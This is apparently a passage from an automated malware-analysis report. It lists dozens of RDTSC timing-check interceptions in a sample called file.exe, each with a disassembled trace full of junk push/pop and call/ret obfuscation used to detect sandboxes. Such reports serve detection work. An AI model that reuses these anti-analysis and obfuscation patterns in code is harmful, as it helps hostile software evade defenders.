[ebp+122D2284h], eax 0x00000057 mov ebx, dword ptr [ebp+122D3B15h] 0x0000005d nop 0x0000005e jne 00007F789C73D5C7h 0x00000064 push eax 0x00000065 push eax 0x00000066 push edx 0x00000067 push eax 0x00000068 push edx 0x00000069 je 00007F789C73D5A6h 0x0000006f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E6169 second address: 5E616F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E7E7C second address: 5E7E93 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F789C73D5A8h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 jc 00007F789C73D5A6h 0x00000016 pop ecx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E8E66 second address: 5E8F01 instructions: 0x00000000 rdtsc 0x00000002 je 00007F789CC6148Ch 0x00000008 jne 00007F789CC61486h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 push 00000000h 0x00000015 push ebp 0x00000016 call 00007F789CC61488h 0x0000001b pop ebp 0x0000001c mov dword ptr [esp+04h], ebp 0x00000020 add dword ptr [esp+04h], 0000001Bh 0x00000028 inc ebp 0x00000029 push ebp 0x0000002a ret 0x0000002b pop ebp 0x0000002c ret 0x0000002d jmp 00007F789CC61495h 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push ecx 0x00000037 call 00007F789CC61488h 0x0000003c pop ecx 0x0000003d mov dword ptr [esp+04h], ecx 0x00000041 add dword ptr [esp+04h], 0000001Dh 0x00000049 inc ecx 0x0000004a push ecx 0x0000004b ret 0x0000004c pop ecx 0x0000004d ret 0x0000004e sbb ebx, 4EBA4AC2h 0x00000054 push 00000000h 0x00000056 push 00000000h 0x00000058 push edx 0x00000059 call 00007F789CC61488h 0x0000005e pop edx 0x0000005f mov dword ptr [esp+04h], edx 0x00000063 add dword ptr [esp+04h], 00000014h 0x0000006b inc edx 0x0000006c push edx 0x0000006d ret 0x0000006e pop edx 0x0000006f ret 0x00000070 push eax 0x00000071 pushad 0x00000072 pushad 0x00000073 push eax 0x00000074 push edx 0x00000075 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E8067 second address: 5E806B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E8F01 second address: 5E8F07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E806B second address: 5E8078 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E8F07 second address: 5E8F14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jbe 00007F789CC61486h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E8078 second address: 5E807E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E807E second address: 5E80EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b jmp 00007F789CC61496h 0x00000010 push dword ptr fs:[00000000h] 0x00000017 js 00007F789CC61489h 0x0000001d mov di, dx 0x00000020 mov dword ptr fs:[00000000h], esp 0x00000027 push 00000000h 0x00000029 push edx 0x0000002a call 00007F789CC61488h 0x0000002f pop edx 0x00000030 mov dword ptr [esp+04h], edx 0x00000034 add dword ptr [esp+04h], 00000019h 0x0000003c inc edx 0x0000003d push edx 0x0000003e ret 0x0000003f pop edx 0x00000040 ret 0x00000041 mov ebx, dword ptr [ebp+1245A9D8h] 0x00000047 mov eax, dword ptr [ebp+122D0111h] 0x0000004d push FFFFFFFFh 0x0000004f mov ebx, edi 0x00000051 nop 0x00000052 push eax 0x00000053 push edx 0x00000054 push eax 0x00000055 push edx 0x00000056 push edx 0x00000057 pop edx 0x00000058 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E80EE second address: 5E80F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E80F2 second address: 5E80F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E80F8 second address: 5E80FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E80FE second address: 5E8110 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007F789CC61486h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EA035 second address: 5EA0A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a mov edi, dword ptr [ebp+122D392Dh] 0x00000010 push dword ptr fs:[00000000h] 0x00000017 mov ebx, dword ptr [ebp+122D3975h] 0x0000001d mov dword ptr fs:[00000000h], esp 0x00000024 push 00000000h 0x00000026 push esi 0x00000027 call 00007F789C73D5A8h 0x0000002c pop esi 0x0000002d mov dword ptr [esp+04h], esi 0x00000031 add dword ptr [esp+04h], 00000019h 0x00000039 inc esi 0x0000003a push esi 0x0000003b ret 0x0000003c pop esi 0x0000003d ret 0x0000003e mov ebx, 5CB474A7h 0x00000043 mov eax, dword ptr [ebp+122D0C45h] 0x00000049 cld 0x0000004a xor dword ptr [ebp+122DB94Ch], edi 0x00000050 push FFFFFFFFh 0x00000052 clc 0x00000053 nop 0x00000054 jmp 00007F789C73D5AFh 0x00000059 push eax 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d push edx 0x0000005e pushad 0x0000005f popad 0x00000060 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EA0A6 second address: 5EA0AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ECF6D second address: 5ECF73 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ECF73 second address: 5ECF84 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F789CC61488h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edi 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EDEFC second address: 5EDFA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F789C73D5B2h 0x0000000a popad 0x0000000b push eax 0x0000000c jl 00007F789C73D5B2h 0x00000012 jg 00007F789C73D5ACh 0x00000018 nop 0x00000019 push 00000000h 0x0000001b push eax 0x0000001c call 00007F789C73D5A8h 0x00000021 pop eax 0x00000022 mov dword ptr [esp+04h], eax 0x00000026 add dword ptr [esp+04h], 0000001Dh 0x0000002e inc eax 0x0000002f push eax 0x00000030 ret 0x00000031 pop eax 0x00000032 ret 0x00000033 jmp 00007F789C73D5ABh 0x00000038 push 00000000h 0x0000003a clc 0x0000003b push 00000000h 0x0000003d push 00000000h 0x0000003f push edi 0x00000040 call 00007F789C73D5A8h 0x00000045 pop edi 0x00000046 mov dword ptr [esp+04h], edi 0x0000004a add dword ptr [esp+04h], 00000018h 0x00000052 inc edi 0x00000053 push edi 0x00000054 ret 0x00000055 pop edi 0x00000056 ret 0x00000057 mov dword ptr [ebp+122D1B7Ch], eax 0x0000005d push eax 0x0000005e push eax 0x0000005f push edx 0x00000060 jl 00007F789C73D5BFh 0x00000066 jmp 00007F789C73D5B9h 0x0000006b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EDFA5 second address: 5EDFAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EDFAB second address: 5EDFAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EC08E second address: 5EC092 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ED1A8 second address: 5ED1AD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EEEF3 second address: 5EEF5F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F789CC6148Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007F789CC61488h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 00000017h 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push esi 0x0000002e call 00007F789CC61488h 0x00000033 pop esi 0x00000034 mov dword ptr [esp+04h], esi 0x00000038 add dword ptr [esp+04h], 00000016h 0x00000040 inc esi 0x00000041 push esi 0x00000042 ret 0x00000043 pop esi 0x00000044 ret 0x00000045 jmp 00007F789CC6148Dh 0x0000004a xchg eax, esi 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f push ecx 0x00000050 pop ecx 0x00000051 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EEF5F second address: 5EEF63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EEF63 second address: 5EEF69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EEF69 second address: 5EEF81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F789C73D5ADh 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edi 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EE0EA second address: 5EE191 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F789CC61496h 0x00000008 jp 00007F789CC61486h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov dword ptr [esp], eax 0x00000014 mov ebx, dword ptr [ebp+122D2C24h] 0x0000001a push dword ptr fs:[00000000h] 0x00000021 jne 00007F789CC6148Ch 0x00000027 mov dword ptr fs:[00000000h], esp 0x0000002e push 00000000h 0x00000030 push esi 0x00000031 call 00007F789CC61488h 0x00000036 pop esi 0x00000037 mov dword ptr [esp+04h], esi 0x0000003b add dword ptr [esp+04h], 00000014h 0x00000043 inc esi 0x00000044 push esi 0x00000045 ret 0x00000046 pop esi 0x00000047 ret 0x00000048 mov dword ptr [ebp+122D2672h], ebx 0x0000004e mov eax, dword ptr [ebp+122D16C5h] 0x00000054 pushad 0x00000055 pushad 0x00000056 and esi, 6F6226B6h 0x0000005c mov dword ptr [ebp+124899D4h], edx 0x00000062 popad 0x00000063 mov esi, dword ptr [ebp+122D1E9Dh] 0x00000069 popad 0x0000006a sbb ebx, 1145E24Dh 0x00000070 push FFFFFFFFh 0x00000072 jbe 00007F789CC61486h 0x00000078 nop 0x00000079 push eax 0x0000007a push edx 0x0000007b pushad 0x0000007c jmp 00007F789CC6148Bh 0x00000081 jc 00007F789CC61486h 0x00000087 popad 0x00000088 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EE191 second address: 5EE19B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F789C73D5A6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EE19B second address: 5EE1BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F789CC61494h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EE1BC second address: 5EE1C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EE1C0 second address: 5EE1C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EE1C6 second address: 5EE1CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EE1CC second address: 5EE1D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EF081 second address: 5EF087 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F0F6E second address: 5F0F7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F789CC6148Bh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F0186 second address: 5F01A1 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F789C73D5A8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d ja 00007F789C73D5ACh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 595B7F second address: 595B98 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F789CC61492h 0x00000008 pushad 0x00000009 push esi 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 595B98 second address: 595B9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F86B3 second address: 5F86D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F789CC61493h 0x0000000e jmp 00007F789CC6148Ah 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F86D9 second address: 5F86F5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F789C73D5B6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F8B11 second address: 5F8B15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FCAFF second address: 5FCB03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FCB03 second address: 5FCB49 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F789CC61493h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jng 00007F789CC6149Bh 0x00000011 js 00007F789CC61495h 0x00000017 jmp 00007F789CC6148Fh 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 push eax 0x00000021 push edx 0x00000022 js 00007F789CC6148Ch 0x00000028 js 00007F789CC61486h 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FCBD2 second address: 5FCBEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop esi 0x00000006 push eax 0x00000007 jmp 00007F789C73D5AEh 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 pushad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FCD27 second address: 5FCD43 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F789CC61494h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FCD43 second address: 421C32 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b jmp 00007F789C73D5AFh 0x00000010 pop eax 0x00000011 stc 0x00000012 push dword ptr [ebp+122D0825h] 0x00000018 jmp 00007F789C73D5B0h 0x0000001d call dword ptr [ebp+122D2509h] 0x00000023 pushad 0x00000024 pushad 0x00000025 mov edi, dword ptr [ebp+122D3B49h] 0x0000002b popad 0x0000002c xor eax, eax 0x0000002e mov dword ptr [ebp+122D1953h], edi 0x00000034 mov edx, dword ptr [esp+28h] 0x00000038 jmp 00007F789C73D5B5h 0x0000003d mov dword ptr [ebp+122D3A41h], eax 0x00000043 xor dword ptr [ebp+122D1953h], ecx 0x00000049 sub dword ptr [ebp+122D23D4h], edi 0x0000004f mov esi, 0000003Ch 0x00000054 jmp 00007F789C73D5B2h 0x00000059 add esi, dword ptr [esp+24h] 0x0000005d je 00007F789C73D5B2h 0x00000063 jbe 00007F789C73D5ACh 0x00000069 mov dword ptr [ebp+122D1953h], ebx 0x0000006f lodsw 0x00000071 clc 0x00000072 add eax, dword ptr [esp+24h] 0x00000076 pushad 0x00000077 mov bh, 82h 0x00000079 jbe 00007F789C73D5A6h 0x0000007f popad 0x00000080 mov ebx, dword ptr [esp+24h] 0x00000084 cld 0x00000085 nop 0x00000086 push ecx 0x00000087 push eax 0x00000088 push edx 0x00000089 jns 00007F789C73D5A6h 0x0000008f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6038C3 second address: 6038CE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push edi 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 603444 second address: 603460 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F789C73D5B6h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 603460 second address: 603464 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 603464 second address: 603468 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6035CB second address: 6035DD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F789CC6148Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60374D second address: 603759 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F789C73D5A6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 608EB5 second address: 608EFB instructions: 0x00000000 rdtsc 0x00000002 jo 00007F789CC61486h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F789CC61494h 0x00000011 popad 0x00000012 push edx 0x00000013 jng 00007F789CC61488h 0x00000019 push edx 0x0000001a pop edx 0x0000001b push ebx 0x0000001c jmp 00007F789CC61499h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 607A60 second address: 607A77 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F789C73D5B3h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 607A77 second address: 607A81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 607A81 second address: 607A87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 607A87 second address: 607AB7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F789CC6148Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F789CC61496h 0x00000011 jp 00007F789CC61488h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 607C2A second address: 607C34 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F789C73D5ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 607EF9 second address: 607F15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F789CC61497h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 607F15 second address: 607F1A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 607F1A second address: 607F2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F789CC61486h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 608064 second address: 608068 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 608068 second address: 608087 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F789CC61499h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 608676 second address: 608686 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnl 00007F789C73D5A6h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 608929 second address: 608936 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F789CC61486h 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 608936 second address: 60893C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60893C second address: 608941 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 608941 second address: 608957 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F789C73D5B0h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 608957 second address: 60895D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60895D second address: 608961 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BDEBE second address: 5BDED1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 jl 00007F789CC6148Eh 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60C342 second address: 60C348 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60C348 second address: 60C35B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F789CC6148Dh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 593F89 second address: 593FA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F789C73D5B2h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 593FA0 second address: 593FC2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F789CC61492h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jo 00007F789CC6148Eh 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 593FC2 second address: 593FC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
